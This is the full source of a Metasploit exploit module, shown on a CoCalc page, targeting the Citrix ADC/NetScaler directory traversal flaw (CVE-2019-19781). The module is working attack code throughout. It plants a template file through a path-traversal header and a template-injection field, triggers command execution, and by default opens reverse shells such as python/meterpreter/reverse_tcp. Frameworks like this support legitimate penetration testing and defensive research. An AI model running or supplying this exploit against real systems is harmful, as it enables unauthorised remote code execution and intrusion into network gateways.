Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  prepend Msf::Exploit::Remote::AutoCheck

11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Remote::CheckModule

13
  include Msf::Exploit::FileDropper

14
  include Msf::Module::Deprecated

15


16
  moved_from 'exploit/linux/http/citrix_dir_traversal_rce'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',

23
        'Description' => %q{

24
          This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka

25
          NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.

26
        },

27
        'Author' => [

28
          'Mikhail Klyuchnikov',          # Discovery

29
          'Project Zero India',           # PoC used by this module

30
          'TrustedSec',                   # PoC used by this module

31
          'James Brytan',                 # PoC contributed independently

32
          'James Smith',                  # PoC contributed independently

33
          'Marisa Mack',                  # PoC contributed independently

34
          'Rob Vinson',                   # PoC contributed independently

35
          'Sergey Pashevkin',             # PoC contributed independently

36
          'Steven Laura',                 # PoC contributed independently

37
          'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)

38
        ],

39
        'References' => [

40
          ['CVE', '2019-19781'],

41
          ['EDB', '47901'],

42
          ['EDB', '47902'],

43
          ['URL', 'http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027'],

44
          ['URL', 'http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],

45
          ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']

46
        ],

47
        'DisclosureDate' => '2019-12-17',

48
        'License' => MSF_LICENSE,

49
        'Platform' => ['python', 'unix'],

50
        'Arch' => [ARCH_PYTHON, ARCH_CMD],

51
        'Privileged' => false,

52
        'Targets' => [

53
          [

54
            'Python',

55
            {

56
              'Platform' => 'python',

57
              'Arch' => ARCH_PYTHON,

58
              'Type' => :python,

59
              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }

60
            }

61
          ],

62
          [

63
            'Unix Command',

64
            {

65
              'Platform' => 'unix',

66
              'Arch' => ARCH_CMD,

67
              'Type' => :unix_cmd,

68
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }

69
            }

70
          ]

71
        ],

72
        'DefaultTarget' => 0,

73
        'DefaultOptions' => {

74
          'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',

75
          'HttpClientTimeout' => 3.5

76
        },

77
        'Notes' => {

78
          'AKA' => ['Shitrix'],

79
          'Stability' => [CRASH_SAFE],

80
          'Reliability' => [REPEATABLE_SESSION],

81
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

82
        }

83
      )

84
    )

85


86
    register_options([

87
      OptString.new('TARGETURI', [true, 'Base path', '/'])

88
    ])

89
  end

90


91
  def cmd_unix_generic?

92
    datastore['PAYLOAD'] == 'cmd/unix/generic'

93
  end

94


95
  def exploit

96
    print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")

97
    vprint_status("Generated payload: #{payload.encoded}")

98


99
    case target['Type']

100
    when :python

101
      execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))

102
    when :unix_cmd

103
      if (res = execute_command(payload.encoded)) && cmd_unix_generic?

104
        print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))

105
      end

106
    end

107
  end

108


109
  def execute_command(cmd, _opts = {})

110
    filename = rand_text_alpha(8..42)

111
    nonce = rand_text_alpha(8..42)

112


113
    res = send_request_cgi(

114
      'method' => 'POST',

115
      'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),

116
      'headers' => {

117
        'NSC_USER' => "../../../netscaler/portal/templates/#{filename}",

118
        'NSC_NONCE' => nonce

119
      },

120
      'vars_post' => {

121
        'url' => rand_text_alpha(8..42),

122
        'title' => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"

123
      }

124
    )

125


126
    unless res && res.code == 200

127
      print_error('No response to POST newbm.pl request')

128
      return

129
    end

130


131
    res = send_request_cgi(

132
      'method' => 'GET',

133
      'uri' => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),

134
      'headers' => {

135
        'NSC_USER' => rand_text_alpha(8..42),

136
        'NSC_NONCE' => nonce

137
      },

138
      'partial' => true

139
    )

140


141
    unless res && res.code == 200

142
      print_warning("No response to GET #{filename}.xml request")

143
    end

144


145
    register_files_for_cleanup(

146
      "/netscaler/portal/templates/#{filename}.xml",

147
      "/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2"

148
    )

149


150
    res

151
  end

152


153
  def chr_payload(cmd)

154
    cmd.each_char.map { |c| "chr(#{c.ord})" }.join('.')

155
  end

156


157
end

158


159